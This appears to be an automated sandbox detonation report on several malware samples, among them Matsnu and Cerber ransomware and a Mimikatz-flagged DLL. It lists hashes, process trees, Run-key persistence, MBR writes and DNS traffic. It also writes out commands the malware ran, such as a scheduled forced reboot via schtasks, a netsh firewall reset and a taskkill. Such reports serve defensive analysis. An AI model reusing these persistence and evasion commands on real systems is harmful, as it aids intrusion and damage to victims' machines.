SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240611-en

Max time kernel

1750s

Max time network

1754s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\blwkxyjx = "C:\\Users\\Admin\\AppData\\Roaming\\Sbyhclwfz\\ykyrpclxyjx.exe" C:\Windows\SysWOW64\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2092 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 1360 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 2856 wrote to memory of 2904 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2904 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2768 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Windows\SysWOW64\svchost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre

C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre

C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre

C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre

C:\Windows\SysWOW64\svchost.exe

svchost.exe

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre

MD5 1b2d2a4b97c7c2727d571bbf9376f54f
SHA1 1fc29938ec5c209ba900247d2919069b320d33b0
SHA256 7634433f8fcf4d13fb46d680802e48eeb160e0f51e228cae058436845976381e
SHA512 506fc96423e5e2e38078806591e09a6eb3cf924eb748af528f7315aa0b929890823798a3ef2a5809c14023c3ff8a3db36277bc90c7b099218422aafa4e0c2ee0

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240419-en

Max time kernel

1799s

Max time network

1800s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

Signatures

Mimikatz

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1C86.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DISTLIST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\EXITEM.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKREQ.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECREC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLPERF.H C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\NOTE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CONTACT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\INFOMAIL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSMMS.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\eula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREQ.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPORT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGN.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPM.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SHARING.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\ClearProtect.docx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSSMS.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RCLRPT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKACC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECURE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1C86.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2092 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2240 wrote to memory of 2248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 2292 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\1C86.tmp
PID 2248 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

C:\Users\Admin\AppData\Local\Temp\1C86.tmp

"C:\Users\Admin\AppData\Local\Temp\1C86.tmp" \\.\pipe\{F46F4EDF-B424-40C2-B1EB-5B93688047ED}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

Network

Country Destination Domain Proto

Files

memory/2240-8-0x00000000001C0000-0x000000000021E000-memory.dmp

memory/2240-0-0x00000000001C0000-0x000000000021E000-memory.dmp

memory/2240-12-0x00000000001C0000-0x000000000021E000-memory.dmp

\Users\Admin\AppData\Local\Temp\1C86.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/2240-24-0x00000000001C0000-0x000000000021E000-memory.dmp

memory/2240-9-0x00000000001C0000-0x000000000021E000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240611-en

Max time kernel

1560s

Max time network

1566s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6.js

Signatures

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6.js

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240226-en

Max time kernel

1792s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe"

Signatures

Cerber

ransomware cerber

Contacts a large (1107) amount of remote hosts

discovery

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp7470.bmp" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Drops file in Program Files directory

Description Indicator Process Target

Drops file in Windows directory

Description Indicator Process Target

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 8 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 8 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 8 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 8 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 8 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 4764 wrote to memory of 3540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4764 wrote to memory of 4192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___W0HPZR_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___HRXS2A6_.txt

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2356 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im "cerber.exe"

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2112 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 5.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 0.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.160.33.178.in-addr.arpa udp
